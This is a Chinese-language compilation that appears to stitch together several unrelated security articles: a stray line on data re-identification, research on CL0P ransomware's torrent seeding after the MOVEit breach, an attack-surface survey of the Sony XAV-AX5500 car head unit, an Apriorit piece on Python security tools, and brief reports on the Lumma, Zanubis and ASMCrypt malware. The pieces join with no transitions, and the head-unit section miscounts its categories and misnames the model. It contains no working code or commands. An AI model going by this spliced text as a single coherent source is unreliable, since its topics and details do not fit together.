通過提前規劃數據重標識，您可以減少違反數據隱私的可能性，同時確保在需要時可以訪問數據。

CL0P是2023年最活躍的勒索軟件組織之一，僅次於LockBit，在最近10個事件響應樣本中，研究人員均觀察到了CL0P。 CL0P勒索軟件組織在成功竊取了數千家公司的數據後，開始使用torrent來傳播受害者數據。 CL0P的torrentseed基礎設施為研究人員提供了一個獨特的機會，讓研究人員深入了解了臭名昭著的勒索軟件組織的直接運行方式，並深入了解他們的交易技巧。通過分析託管被盜數據的現有torrentseed基礎設施，研究人員可以更好地了解這一變化的含義。 為了保護這次攻擊的受害者，研究人員將組織的名稱換成了Pokémon的名稱 CL0P和MOVEit傳輸漏洞的歷史2023年5月底，Progress開發的一款名為MOVEit的軟件產品成為CL0P勒索軟件組織利用的零日漏洞的目標。 CL0P聲稱利用了MOVEit傳輸漏洞，據美國網絡安全和基礎設施局(CISA)估算，該組織對3000多家美國組織和8000多家全球組織實施了攻擊。 CL0P於2019年初出現，並因對受害者使用勒索策略來增加支付贖金的壓力而迅速臭名昭著，他們竊取數據並發布其中的片段。所以，受害者寧願付費，也不願冒險讓他們的數據在全球曝光，這可能比任何傳統的勒索軟件活動都更具破壞性。 然後，這些數據被發佈在一個“洩漏網站”上，如下圖所示，該網站通過洋蔥路由器（Tor）網絡提供服務，這樣做CL0P就可以發起匿名攻擊。 CL0P洩漏 如果你以前用過Tor瀏覽器，就會發現為了匿名，運行速度會非常慢。雖然近年來這方面有了很大的改善，但由於傳輸速度的原因，試圖從洩漏網站下載數據仍然是一個挑戰。 但是，當你從成千上萬的公司竊取數據時，下載速度會慢的讓人發狂。 Torrenting 使世界各地的用戶能夠連接和分享內容，而不必依賴單一的下載源，儘管這種方法很合適，但它仍然有一些缺點。下載過程會影響你設備的速度和功能，而且大文件會佔用大量的存儲空間，這看似對受害者有利，因為通過洋蔥網絡獲取一些洩漏信息是不切實際的。既然攻擊者無法下載被盜數據，為什麼還要支付贖金呢?CL0P改變了他們的策略來解決這個新的數據訪問問題。他們在洩露網站上發帖稱，從2023年8月15日起，他們將開始通過包括torrent在內的多種新方法發布被盜數據，這種方法利用節點文件交換，大大加快了下載過程。 數據發布變更公告 為此，攻擊者兌現了他們的聲明，並創建了一個新的洩漏網站，該網站具有磁力鏈接，即包含文件哈希的超鏈接。大多數torrent客戶端都可以使用這些鏈接來下載數據。 所以，當受害者拒絕支付勒索金額時，攻擊者都會通過這種方法穩定地發布一組新的受害者數據。 具有磁力鏈接的CL0P洩漏網站 人們現在可以以更合理的速度下載128 GB的ZIP文件，而不是試圖通過洋蔥網絡下載一個可能需要幾天甚至幾週才能獲得的文件。然而，torrent有一個問題，那就是數據必須先被播種，這樣你就可以為其他人引導下載速度。這為研究人員提供了一個獨特的機會，通過識別和分析這些torrent的初始seed來深入了解CL0P操作，這個識別過程將是本文的講解重點。 Torrent在深入分析之前，有必要回顧一下torrent的一些概念及其功能。 有兩種類型的“Torrent”，torrent文件本身大多數人都很熟悉，還有磁力鏈接。 torrent文件將包含一條關於跟踪器的信息。 然後，該跟踪器將與客戶端共享節點信息，以便客戶端可以定期接收有關其他對等點的更新，這些對等點可能擁有它們試圖下載的數據片段，這允許對等點快速連接到多個其他對等點，並開始以更高的速率交換數據。 跟踪器對於正常的交換非常有用，但對於操作安全性來說可能不是最好的，因為它們提供了對等點的列表。 磁力鏈接類似於torrent文件，但它們通常沒有任何與跟踪器相關的信息。相反，當客戶端加載磁力鏈接時，它將包含一個從文件的多個方面計算出來的哈希值，該哈希值用於唯一標識torrent所代表的數據。 這種無跟踪器torrent的工作原理是連接到一個分佈式哈希表（DHT）節點，並尋找對等點，這樣就可以交換信息了。 torrenting過程，將追踪器的使用與磁力鏈接進行比較 然後，這些對等點可以交換他們所知道的其他對等點的信息，並且他們可以開始構建連接網絡，最終加快下載過程。 這種去中心化的方法是CL0P為其數據傳播所選擇的。 計劃當然，這種可跟踪性對於任何以前使用過BitTorrent的人來說都不是什麼新聞。多年來，政府、律師事務所和其他機構一直使用這一機制來跟踪與盜版相關活動的同行。 20世紀90年代末，美國唱片業協會（RIAA）對Napster採取了法律行動，接下來的幾年裡，這些因參與這些節點交換的用戶而被起訴，因為這些組織可以識別連接的對等點的IP地址。 那這有什麼不同呢?這裡的主要區別在於，研究人員處理的不是一部被盜電影的torrent，而是數百個單獨的torrent。每個torrent都需要一個初始seed，以便對等點連接、開始下載和交換數據，這就為攻擊創造了機會，其中只有一個對等點擁有100%的文件，而其他對等點正在下載其他部分。 識別遊戲的名稱是速度，其中有兩個因素。首先，你加入這個去中心化群的速度；第二，你與初始100%播種器節點的速度。 當只處理一個torrent時，這兩個因素都非常不可靠。然而，當你從更宏觀的角度看所有的torrent數據時，它描繪了一個非常不同的畫面。 由於研究人員是在後期才加入了torrent，結果100%的對等點不像最初的播種者（seeder）那樣可靠。為了抵消這種影響，研究人員查看了攻擊者釋放它們時的所有節點流，並與較舊的torrent流進行了交叉引用。這讓研究人員可以看到哪些人可能是“真正的”播種者。 在繼續之前，研究人員需要做個簡短的警告，許多人出於各種原因下載這些洩露數據。有時是出於惡意的原因，如獲取憑證、竊取知識產權或進一步利用受害者。 然而，還有許多其他實體出於善意下載了這些數據，他們用這些數據來進一步幫助受害者或其他組織，或進行研究。雖然研究人員無法推斷意圖，但至少可以比較兩組實體的行為。

XAV-AX5500為索尼2020年發布的一款全新的車載中控屏幕設備，它提供了強大的聲音性能、流暢靈敏的觸控屏，並且可以與用戶的智能設備無縫集成。 規格上XAV-AX5500搭載了一塊6.95英寸屏幕，支持電容觸控，內置DSP（數字聲音處理器），搭載EXTRA BASS技術，兼容FLAC無損音頻文件；設計上，XAV-AX5500採用了無邊框設計，後機架單DIN尺寸，節省空間，圓滑的鋁製拉絲紋理按鈕，符合人體工學；功能上，XAV-AX5500兼容Android與iOS，同時支持Apple CarPlay和Android Auto。如果你的手機沒有上述2種功能，索尼XAV-AX5500還支持WebLink Cast，通過有線連接可以鏡像手機屏幕，此外還有倒車影像和快速喚醒等功能。 總的來說，索尼XAV-AX5500是一款流行的售後市場車載主機，可與車輛內的不同系統進行交互。不過，對於攻擊者來說，這也為攻擊者提供了一個攻擊汽車的潛在立足點。 索尼XAV-AX5500攻擊面從廣義上講，車載主機的攻擊面可以分為以下8類： 1.Abalta Technologies的WebLink。 Abalta Technologies是一家車聯網服務軟件解決方案提供商,目前致力於智能車載主機與車輛的整合，和LivioConnect協議一樣，Weblink從本質上來說是一種中間橋樑，它使得汽車的信息娛樂系統與便攜車載主機上的移動應用程序通過藍牙、USB或wifi進行連接和相互作用。 Weblink的很多應用程序已經得到許多追捧，例如導航類應用程序WebNav，流媒體音樂程序Slacker，事件指南應用Wcities以及一個指導你停車的應用程序Parkopedia。 2.Apple CarPlay。 CarPlay 是Apple的車載系統，它將用戶的iOS車載主機、 iOS使用體驗與儀錶盤系統無縫結合，CarPlay僅僅支持擁有Lightning接口的iPhone手機，另外雖然iPad已經支持這一接口，但是蘋果並未將iPad列為CarPlay支持的硬件車載主機。 2016年6月13日，蘋果在WWDC開發者大會上表示，該公司的智能車載系統CarPlay將與iOS 10一同更新，成為新版蘋果地圖和Siri的最佳搭檔。 3.Android Auto。 Android Auto 是谷歌推出的一款車載智能係統，它可以讓您在駕駛過程中便捷使用手機上的地圖、音樂、電話、信息等功能。 Android Auto 的界面設計簡潔美觀，操作邏輯清晰易懂，語音控制功能強大靈敏，支持多種第三方應用。 3.衛星廣播服務SiriusXM。 Sirius XM為美國的數字及衛星廣播服務供應商，提供各種與聲音有關的數字娛樂，不管是音樂、運動、談話節目或播客等，號稱是北美最大的數字音頻供應商，其SiriusXM服務安裝在美國所有主要汽車品牌的新車上，就算是中古車也有接近一半內置了SiriusXM。 SiriusXM系統含有一個身份認證漏洞，由於SiriusXM被集成在不同品牌的車載資訊系統上，於是便可藉由該漏洞挾持車載資訊系統，只要知道汽車的識別碼（VIN），就能訪問汽車與車主資訊、遠程解鎖及啟動汽車、定位汽車或閃光燈等。 4.藍牙連接。 5.USB媒介。 6.無線電數據系統(RDS)，它是在調頻廣播發射信號中利用副載波把電台名稱、節目類型、節目內容及其它信息以數字形式發送出去。 rds 系統獨有“交流信息”功能，若有緊急事件，電台就會發送特殊信號，令收音機強行播放。 rds 在汽車，手機等移動車載主機上使用很方便。 7.開源軟件。 以下鏈接提供了製造商關於XAV-AX5500車載主機的詳細信息，它們提供了車載主機中使用的技術的更多描述。 1.索尼XAV-AX5500產品頁面https://www.sony.com/et/electronics/in-car-receivers-players/xav-ax5500； 2.索尼XAV-AX5500文檔下載https://www.sony.com/electronics/support/mobile-cd-players-digital-media-players-xav-series/xav-ax5500/manuals； 3.索尼XAV-AX5500固件下載https://www.sony.com/electronics/support/mobile-cd-players-digital-media-players-xav-series/xav-ax5500/downloads； 4.索尼XAV-AX5500規格https://www.sony.com/et/electronics/in-car-receivers-players/xav-ax5500/specifications； 5.索尼XAV-AX5500幫助指南https://helpguide.sony.net/ev/xav-ax55/v1/en/index.html； 6.索尼XAV-AX5500幫助指南- USB端口功能描述https://helpguide.sony.net/ev/xav-ax55/v1/en/contents/TP0002733734.html； Abalta Technologies的WebLink索尼XAV-AX5500使用Abalta Technologies的webblink應用程序，該應用程序在車載主機上同時支持Apple CarPlay和Android Auto。當通過USB將手機連接到車載主機時，用戶必須啟動WebLink應用程序才能激活Apple CarPlay或Android Auto。 除了啟用駕駛員首選的駕駛輔助技術外，WebLink應用程序還提供了自己的一組功能，這些功能可能會擴大索尼XAV-AX5500和聯網手機的攻擊面。 第一個最有可能被濫用的應用程序是WebLink的“Cast”功能。 Cast功能顯示所連接手機的觸摸界面，這允許用戶直接從索尼XAV-AX5500觸摸屏控制他們的手機。 Cast功能要求用戶從其移動車載主機授予權限。此外，每次啟動Cast連接時，用戶都必須允許從連接的手機進行此鏈接。這可能會限制安全風險。一旦獲得許可，手機上的任何應用程序都可以從車載主機啟動，索尼XAV-AX5500將幾乎完全控製手機功能，包括更改手機配置和訪問敏感用戶數據的能力。如果車載主機被攻擊者破壞，攻擊者可能會利用Cast功能訪問或修改手機上的數據。 第二個可能被濫用的WebLink功能是WebLink的“音樂”功能，此功能顯示有關手機上當前播放的歌曲信息。目前還不完全清楚通過連接惡意手機進行濫用的可能性，但確實存在潛在的攻擊面。 其他應用程序也與WebLink捆綁在一起，比如與連接的手機上的Waze衛星導航應用程序集成。它還實現了一個本地YouTube應用程序。 Apple CarPlay索尼XAV-AX5500支持Apple CarPlay駕駛輔助技術。連接的手機必須安裝了webblink應用程序，才能在車載主機上訪問CarPlay，連接手機後，WebLink將與該車載主機建立CarPlay會話。這種集成方式的安全影響目前尚不清楚。 一旦建立了CarPlay會話，車載主機和連接的手機就通過USB進行通信，其方式似乎與觀察到的連接手機和其他製造商銷售的車載主機之間發生的通信相同。 車載主機和連接的手機之間的Apple CarPlay通信通過使用IPv6連接的USB進行操作，在連接啟動過程中，車載主機和連接的手機以明文形式交換少量信息，其中一些通信包括二進制Apple plist數據的傳輸。在此初始配置建立之後，連接的手機啟動與車載主機單元的加密TLS會話，需要對這種通信進行進一步的研究，以評估通過USB和IPv6進行CarPlay通信的安全性。 Android Auto索尼XAV-XV5500還支持Android自動駕駛輔助技術，連接的手機必須安裝WebLink應用程序，才能在車載主機上訪問Android Auto。連接手機後，WebLink將與車載主機建立Android Auto會話，這種集成方式的安全影響目前尚不清楚。有關研究人員正在進行進一步的研究，以更好地了解索尼XAV-AX5500和連接的安卓手機之間的通信。 SiriusXM衛星廣播索尼XAV-AX5500與SiriusXM衛星廣播接收器捆綁在一起，此接收器連接到車載主機背面的ten-pin連接器。使用該接收器的通信代表了對車載主機的潛在攻擊面。然而，攻擊者可能必須擊敗從SiriusXM網絡接收的信號中的安全層，才能嘗試通過該通信信道對索尼XAV-AX5500進行攻擊。 除了針對接收器的無線電層攻擊外，SiriusXM接收器和索尼XAV-AX5500之間的本地通信也可能受到攻擊，威脅模型的這一部分可能不在Pwn2Own Automotive的範圍內，因為針對這一部分的攻擊需要對車載主機進行不受控制的物理訪問。此外，與通過USB總線進行的攻擊不同，USB總線需要隨意的物理訪問，如果不從儀表板上拆下整個單元以訪問車載主機後部的連接器，用戶就無法使用SiriusXM接收器的連接器。 藍牙通信索尼XAV-AX5500支持與兼容的移動手機使用藍牙通信。這允許車載主機訪問連接的手機，以便撥打電話、播放音頻和其他潛在用途。上述車載主機用戶手冊中列出了支持的配置文件和其他藍牙支持。 供應商提供的用戶指南如下： USB媒介連接索尼XAV-AX5500廣泛使用USB總線連接手機。車載主機還支持其他類型的USB車載主機，如媒體播放器和USB存儲車載主機。該車載主機支持多種類型的媒體文件編解碼器進行播放。 索尼XAV-AX5500還支持多種版本的FAT文件系統，支持此文件系統類型的車載主機通常在文件系統驅動程序中實現支持。這些類型的系統驅動程序受制於解析特製的文件系統。如果車載主機文件系統驅動程序中存在漏洞，則具有臨時物理訪問權限的攻擊者如果連接了一個精心設計的文件系統，就可能對車載主機文件系統驅動程序執行攻擊。 索尼XAV-AX5500支持多種媒體編解碼器，可在車載主機上播放。其中包括許多使用最廣泛的音頻編解碼器，包括MP3、WAV、AAC和其他媒體格式。車載主機還支持幾種廣泛使用的視頻編解碼器，如MPEG-4和WMV。像這樣的媒體格式是複雜的數據流，這些編解碼器的解析可能容易包含解析錯誤，這些錯誤可能會對執行解析的代碼產生安全影響。 無線電數據系統（RDS）索尼XAV-AX5500實現了對無線電數據系統（RDS）標準的支持，本標准定義了在傳統調頻無線電廣播中傳輸數字信息的方法。這表示由車載主機單元處理的未經驗證的數據源，該標準支持多種數據格式。許多數據字段的大小受到標準中定義的限制。研究人員尚未對索尼XAV-AX5500的RDS實現進行調查，其安全風險目前未知。 開源軟件這些信息是從索尼觸摸屏上收集的。這裡提供的年份是試圖識別正在使用的版本的開始，更好的方法是獲取車載主機的文件系統映像以獲得更好的信息。 索尼XAV-AX5500硬件詳細信息索尼XAV-AX5500由兩塊電路板組成。顯示板承載主顯示屏，以及機組上所有其他用戶界面按鈕，主板連接到車輛，並承載主ARM CPU和無線模塊。為了更好地識別這些設備，有必要進行更多的研究。 索尼XAV-AX5500PCB的詳細圖像如下所示： 具有無線模塊和ARM CPU的PCB板的A面 具有無線模塊和ARM CPU的PCB板的B面 PCB的A面顯示了MXT499T-T自適應觸摸屏控制器和其他組件 PCB的B面顯示了MXT499T-T自適應觸摸屏控制器和其他組件 總結雖然這些可能不是索尼XAV-AX5500車載主機上唯一可用的攻擊面，但它們代表了攻擊者最有可能利用該車載主機的途徑。索尼長期以來一直是無線電和消費類車載主機的領導者，從20世紀50年代的簡單晶體管收音機到80年代無處不在的隨身聽，再到90年代的世界上第一台車載迷你光盤播放器，索尼一直在推動娛樂技術的發展。

確保軟件產品的安全性對於大多數企業來說都是一個挑戰。公司不斷尋找能夠有效滿足其網絡安全需求的技術。一種選擇是使用Python 和基於Python 的工具。 本文對於正在尋找通過自動化安全測試和分析來保護軟件並提高網絡安全策略效率的產品所有者和首席技術官來說非常有用。 如何使用Python 工具實現網絡安全Python是一種高級解釋性編程語言，以其簡單性和可讀性而聞名。由於Python 的可移植性、快速腳本創建、多功能性和簡潔的代碼設計原則，您可以找到大量用Python 編寫的庫。 自動化是Python 網絡安全工具提供的最大優勢之一。 Python 使開發人員能夠專注於復雜問題、簡化網絡安全並提高整體軟件安全性。 通常，開發人員和安全專家以自動化腳本的形式將Python 網絡安全工具集成到他們的產品中。 Python 提供了大量包含現成模塊的庫、包和框架。這些允許開發人員為任何現有解決方案創建高效且快速的腳本，無論核心編程語言如何。自動化腳本是將Python 網絡安全工具集成到軟件產品中的最常見方法。 如果您想增強現有軟件的安全性，可以將用於網絡安全的Python 腳本與以下技術之一集成： 使用互操作性庫。 Python 提供了各種庫，允許您從其他語言（包括C/C++、Java 和.NET）編寫的現有軟件中調用函數或方法。這些庫彌合了語言和框架之間的差距，將腳本和您的軟件綁定在一起。例如，Cython允許Python 和C 代碼之間的通信。 構建API。應用程序編程接口(API) 是連接兩個不同軟件並實現數據交換的通用方法。要將Python 腳本連接到現有軟件，您可以使用Flask、Django REST 或FastAPI 等框架。 包裝現有代碼。這種方法需要圍繞現有代碼創建Python 包裝器，並為Python 提供與軟件功能交互的接口。 使用消息傳遞或數據交換。使用此方法，您可以在代碼和Python 腳本之間創建通信通道。為此，您可以通過ZeroMQ等庫使用進程間通信或消息隊列。這使您的代碼保持清晰、模塊化和可擴展。 腳本自動化已集成到大多數與網絡安全相關的Python 工具中，這允許開發人員自定義腳本並使用最少的代碼來創建它們。 儘管Python 擁有大量的庫和工具，但您自己弄清楚它們可能具有挑戰性。在Apriorit，我們不斷使用Python 來執行網絡安全任務，並擁有經過時間驗證的Python 庫、框架、包和工具的工具包。在接下來的兩節中，我們將分享一些基於實踐的Python 工具建議，這些工具可以幫助提高產品的網絡安全性。 我們將網絡安全活動分為兩大類： 安全測試 安全分析 這兩項活動對於維護軟件產品的強大安全性至關重要。您可以找到許多有效的Python 工具來涵蓋這些網絡安全任務並幫助您評估軟件的每個部分。讓我們探索Python 語言在網絡安全中的用途以及它為每項任務提供的工具。 使用Python工具進行安全測試安全測試允許您評估您的軟件並識別漏洞、弱點和潛在的安全威脅。在安全測試期間，網絡安全專家會運行測試和攻擊模擬，以確定軟件抵禦安全攻擊和保護敏感數據的能力。定期進行安全測試對於確保您的軟件免受黑客攻擊至關重要。 以下是您可以使用Python 工具完成的主要網絡安全測試任務： 讓我們詳細討論關鍵的安全測試任務，並探討基於Python 的工具如何幫助您發現和消除系統中的安全漏洞。 滲透測試滲透測試模擬現實世界的攻擊並分析網絡、系統和應用程序如何響應。此過程允許網絡安全專家評估風險、識別漏洞並提供安全改進建議。 Apriotit 的滲透測試團隊在網絡安全活動中使用Python，例如有效負載生成和利用、用於識別安全漏洞的Web 應用程序測試、密碼安全評估以及用於網絡分析的數據包嗅探和TCP 數據包注入。這些活動有助於主動識別和解決安全漏洞，從而保護組織的聲譽。 如果您正在尋找滲透測試工具，有許多基於Python 的庫和工具可以自動化此過程，包括： PyMetasploit— 一個庫，允許滲透測試人員在Python 中編寫和自動化Metasploit腳本，以識別漏洞、執行攻擊和逃避檢測 Python Nmap- 一個庫，可幫助您的滲透測試團隊使用Nmap 端口掃描器，使他們能夠識別網絡上的活動主機並將其用於滲透測試活動 PyCrypto— 一個用於加密、解密、散列和密鑰管理的包，滲透測試人員可以用它來測試加密實現和分析漏洞 Matplotlib— 一種數據可視化和分析工具，可幫助您創建報告和可視化數據，以便在完成滲透測試活動後創建可行的計劃 漏洞掃描漏洞掃描是搜索軟件、網絡或系統中的弱點和缺陷的系統過程。它允許企業保護其數據和資產、遵守法規並主動防止違規。通常，漏洞識別的結果隨後會用於滲透測試，我們將在下一節中討論。 為了有效識別漏洞，不給攻擊者留下可乘之機，Apriorit 的安全專家定期進行安全審計、靜態分析、代碼審查等。 Python 有許多工具和庫可以幫助您構建用於定期漏洞掃描的自動化腳本，包括： Bandit— 一種靜態代碼分析工具，專門專注於識別Python 代碼中的安全問題和漏洞，檢查潛在的安全缺陷，例如SQL 注入、命令注入等 ZAP API Python— 一種API，可讓您訪問流行的ZAPWeb 應用程序掃描程序，以自動執行安全掃描並識別Web 應用程序中的漏洞 Vulners— 一個Python 庫，可讓您訪問世界上最大的安全數據庫，使您能夠分析有關已知漏洞和相關漏洞的信息；它還提供用於搜索、檢索、歸檔和漏洞掃描的API 網絡安全測試網絡是黑客最常見的入口點之一。網絡安全測試使網絡安全專家能夠通過識別網絡弱點和潛在入口點來防止未經授權的訪問、黑客攻擊和破壞。 Apriotit 的網絡安全團隊使用Python 進行網絡安全測試和自動化活動，例如端口和網絡掃描、套接字編程和Web 服務器指紋識別。 以下是一些基於Python 的庫，可以幫助您完成這些任務： Scapy— 一個Python 數據包操作庫，用於生成自定義數據包。它有助於網絡分析、滲透測試和取證調查，使其成為一種極其通用且廣泛使用的網絡安全工具。 Socket— 一個內置模塊，允許您創建和操作套接字。使用Socket，您可以創建自己的網絡安全工具，例如網絡掃描器和端口掃描器。 Httprint— 一種Web 服務器指紋識別工具，可與Python 一起使用來識別Web 服務器軟件和版本，即使它被混淆了。 應用程序和網站安全測試應用程序和網站安全測試涉及對可能被攻擊者利用的軟件代碼和配置的系統評估。通過執行定期軟件測試，您可以保護您的產品免受DDoS 攻擊和其他基於負載的網絡攻擊。 為了評估系統在壓力下的抵抗力和執行能力，我們的網絡安全團隊模擬了高水平的流量和壓力。 Python 提供了大量庫，可以幫助自動化負載生成、壓力測試和DDoS 模擬等活動。讓我們看一下其中的一些。 Locust是一種開源工具，可以通過讓數百萬並髮用戶聚集來測試系統。 Apriorit 團隊使用Locust 通過負載測試來識別瓶頸、性能問題和系統限制。 AsyncIO是一個異步庫，我們的網絡安全專家通過創建具有多個並發請求或連接的腳本來進行應用程序壓力測試。 Psutil是一個用於進程和系統監控的跨平台庫。它可以幫助網絡安全專家在負載測試期間監控系統資源並識別漏洞或性能問題。 如您所見，通過使用不同的Python 工具進行安全測試，您可以增強系統抵禦現實攻擊的能力，最大限度地減少漏洞並主動保護您的資產。 現在，我們來談談使用安全分析來降低安全風險，以及如何使用Python 工具提高產品的網絡安全性。 使用Python工具進行安全分析安全分析使您能夠主動評估應用程序或系統的安全性，了解其安全架構及其效率。 為了保護您的軟件免受可能的網絡安全威脅和惡意因素的影響，編寫看似安全的高質量代碼是不夠的。根據手頭的任務和您所在的行業，您可能需要應用不同形式的高級安全分析： Python 提供了多種工具可供選擇，可以幫助您的開發人員和安全專家完成所有這些任務。請記住，這絕不是用於安全分析的Python 工具的完整列表。 逆向工程逆向工程是分析軟件以揭示硬件和軟件的內部工作原理和結構的過程。這對於提高產品安全性、了解未記錄的代碼以及確保與第三方工具的兼容性至關重要。您還可以使用逆向工程來保護您的敏感數據免受網絡攻擊或發現侵犯知識產權的行為。 逆向工程要求開發人員在網絡安全方面擁有深厚的專業知識和廣泛的知識。 Apriorit 的逆向工程專家擁有強大的技術背景，隨時準備解決重要的任務。 在Apriorit，我們使用Python工具將二進製文件自動反彙編和反編譯為可讀格式，從而更好地理解程序的低級指令。例如，在我們的一個項目中，Apriorit 逆向工程師使用Python 來提高IDA操作反彙編代碼的能力。 Python 腳本還有助於提取特定信息、操作數據或執行靜態和動態分析。 如果您正在尋找用於逆向工程活動的Python 工具，請注意以下幾點： Capstone— 一個輕量級反彙編框架，帶有Python 綁定，逆向工程師使用它將機器代碼反彙編為人類可讀的彙編語言 Radare2— 一個強大的命令行工具和庫，用於逆向工程、反彙編、調試和分析二進製文件 Frida-Python— 一組可移植的Python 綁定，允許開發人員使用流行的Frida 框架編寫用於動態分析和調試的Python 腳本 Pyhidra— 一個用於網絡安全的Python 庫，可以直接訪問最強大的逆向工程工具之一（稱為Ghidra），它允許您對二進製文件進行逆向工程、調試和分析代碼，以及反編譯、腳本和協作 Angr— 一個用於靜態和動態二進制分析的開源Python 框架，可幫助工程師了解閉源軟件的內部工作原理並識別潛在漏洞 惡意軟件分析惡意軟件分析使開發人員能夠識別和檢查惡意軟件，以確定其潛在影響、行為和功能。基於Python 的靜態和動態惡意軟件分析工具可以幫助您識別惡意軟件特徵，並通過在安全且隔離的環境中運行惡意軟件來保護您的軟件將來免受類似惡意軟件的侵害。 這對於開發防病毒軟件、威脅情報平台和其他網絡安全解決方案尤其重要，因為惡意軟件可以主動避開沙箱並試圖保持不被發現。 Apriotit 的網絡安全團隊在惡意軟件分析的每個階段都使用Python 工具，從安裝庫和設置受控環境到模擬和執行其中的代碼。這使得我們的網絡安全專家能夠毫無風險地觀察惡意軟件行為。 以下是我們推薦的用於高效惡意軟件分析的主要Python 工具和庫： Pyew— 一種基於Python 的命令行工具，用於對惡意軟件樣本執行取證分析，可以轉換和反彙編文件並分析其中的代碼部分以檢測可疑行為 Yara-python— 一個允許您使用YARA 的庫，YARA 是一種用於惡意軟件研究、檢測和識別的流行工具 Cuckoo Sandbox— 一種允許您在安全且受控的環境中運行惡意軟件的工具，這樣您就可以安全地分析任何可疑文件並獲取有關該文件執行時的行為的詳細報告 Malgazer— 一個基於ML 的Python 惡意軟件分析庫，可幫助您自動執行各種分析任務、從惡意軟件樣本中提取特徵、對惡意軟件進行分類以及識別各種惡意軟件樣本的模式和趨勢 行為分析 行為分析允許您檢測系統或網絡甚至用戶操作中的任何異常活動。任何意外或非典型的行為模式都可能表明惡意內部人員、惡意軟件感染、DoS 攻擊等造成的安全威脅。 Apriotit 網絡安全團隊使用基於Python 的工具來分析行為，以設置模式識別和異常檢測。 Python 工具還可以幫助自動執行實時行為分析，以便您可以快速響應攻擊並在造成任何損害之前預防攻擊。 以下是各種Python 庫，可以幫助您輕鬆檢測系統中的異常行為： PyOD— 一個專門且統一的Python 庫，具有一套全面的可擴展算法，用於檢測各種軟件系統中的異常數據，甚至是大型未標記數據集中的異常數據 Scikit-learn— 一個流行的基於ML 的Python 庫，具有多種基於數據異常值的異常檢測算法 TensorFlow— 一個用於檢測異常模式的開源機器學習庫。您可以使用Keras簡化TensorFlow 的工作，Keras 是一個前端API，為構建神經網絡提供高級接口。 Prophet— 一個Facebook 支持的庫，用於檢測時間序列數據中的異常情況，可用於識別異常網絡流量或系統行為 法醫分析取證分析使您能夠有效地響應網絡安全攻擊，恢復損壞的數據，並通過保護您的軟件來防止將來發生類似事件。 Apriorit 的網絡安全團隊使用Python 工具在數據雕刻、日誌分析和其他活動的幫助下進行取證分析。 以下是可用於取證分析的最流行的庫： Dfvfs— 一個提供對來自各種類型的存儲介質和文件格式的文件系統對象的只讀訪問的庫 Volatility— 一種高級內存提取框架，有助於識別正在運行的進程、網絡連接和打開的文件，或檢測惡意軟件或入侵的跡象 Rekall— 一種提供高級內存分析功能的流行框架 在分析數據之前，您需要檢索數據。數據提取允許您從各種來源獲取數據，包括文件、數據庫、服務器、網絡流量和日誌。為此，您可以使用BeautifulSoup、MechanicalSoup和Requests等庫。 總體而言，安全分析不僅僅是您需要執行的一組任務。您需要持續執行此過程，以防止攻擊并快速響應。正確的安全分析策略與Python 工具和自動化的強大功能相結合，可以使您的網絡安全工作更加高效和一致。 結論確保產品的網絡安全需要採用複雜的方法，包括定期測試、分析、修補和錯誤修復。使用Python 腳本的網絡安全自動化可以幫助您進行定期安全活動並覆蓋軟件的每個部分，這樣它就不會成為黑客的切入點。

只要攻擊者想賺錢，他們就會不斷開發惡意程序，只要他們不斷開發惡意程序，研究人員就會不斷分析。例如，研究人員發布了一份關於在地下論壇上發現的新惡意程序的報告，研究人員稱之為ASMCrypt，它與DoubleFinger加載程序有關。 但攻擊事件層出不窮，研究人員發布了關於新版Lumma竊取程序和Zanubis Android銀行木馬的報告。 Lumma通過從受感染的設備和已安裝的應用程序中收集敏感信息，LummaC2 是輕量級的，大小僅為150-200 KB，可以感染從Windows 7 到Windows 11 的所有操作系統。 LummaC2 惡意程序能夠從用戶的計算機收集密碼、信用卡號、銀行賬戶和其他個人信息。它還可以訪問存儲在Web 瀏覽器（例如Chrome 和Firefox）中的數據，此外，LummaC2 可以在用戶不知情的情況下截取用戶的桌面或活動窗口，這使攻擊者能夠訪問可用於經濟利益或身份盜用的敏感數據。 Zanubis 木馬是一種針對Android 設備的惡意程序，屬於銀行木馬，這是一種旨在盜取銀行憑證的程序。之後，攻擊者可以訪問被攻擊的賬戶並將受害者的資金轉移到他們自己的賬戶中， 與大多數銀行木馬一樣，Zanubis 也利用Android 無障礙服務來執行其操作。 這一合法的Android 功能旨在幫助殘障用戶更輕鬆、更充實地操作他們的智能設備， 此外，Zanubis 還會收集各種設備詳細信息，包括製造商、設備型號、已安裝應用程序列表、受害者的聯繫人列表、指紋等。另外，它還可以獲得電池權限，以避免在用戶激活任何電池優化過程時被強制進入“睡眠”模式。 Zanubis 的運營商還可以向受害者發送SMS 消息或顯示選定的通知，他們甚至可能刪除特定應用程序或鎖定受感染設備的屏幕。 ASMCrypt研究人員監控著許多地下論壇，在其中一個網站上，他們看到了一則廣告，上面正在宣傳一種名為ASMCrypt的新密碼/加載程序變體。這種類型的惡意程序背後的想法是，在沒有加載過程或有效負載本身被AV/EDR等檢測到的情況下加載最終有效負載。這聽起來很像之前介紹的DoubleFinger加載程序。 事實上，經過仔細分析，研究人員高度相信ASMCrypt是DoubleFinger的迭代版。然而，ASMCrypt的工作方式略有不同，它更像是運行在TOR網絡上的實際服務的“前台”。 那麼它是如何工作的呢？首先，購買者獲得ASMCrypt二進製文件，該二進製文件通過TOR網絡使用硬編碼憑據連接到惡意程序的後端服務。如果一切正常，將顯示選項菜單： 買方可以從以下選項中進行選擇： 隱形或隱形注射方式； 有效負載應注入的進程； 用於啟動持久性的文件夾名稱； Stub類型：要么是偽裝成Apple QuickTime的惡意程序本身，要么是側加載惡意DLL的合法應用程序。 選擇所有所需選項並按下構建按鈕後，應用程序將創建一個隱藏在.png文件中的加密blob，此圖像必須上傳到圖像託管網站。最後一點提到的惡意DLL或二進製文件也會被創建並被傳播。 當惡意DLL在受害系統上執行時，它會下載.png文件，對其進行解密，將其加載到內存中，然後執行。 LummaArkei竊取程序是用c++編寫的，於2018年5月首次出現，在過去幾年中已經多次被迭代或重新命名。它曾被稱為Vidar, Oski, Mars和現在的Lumma，與Arkei有46%的重疊。隨著時間的推移，所有變體的主要功能均保持不變，從加密錢包竊取緩存文件、配置文件和日誌，它可以通過充當瀏覽器插件來實現這一點，但它也支持獨立的Binance應用程序。 但首先是感染媒介。 Lumma是通過一個模仿合法.docx到.pdf網站的偽造網站傳播的。上傳文件時，返回的文件擴展名為.pdf.exe。 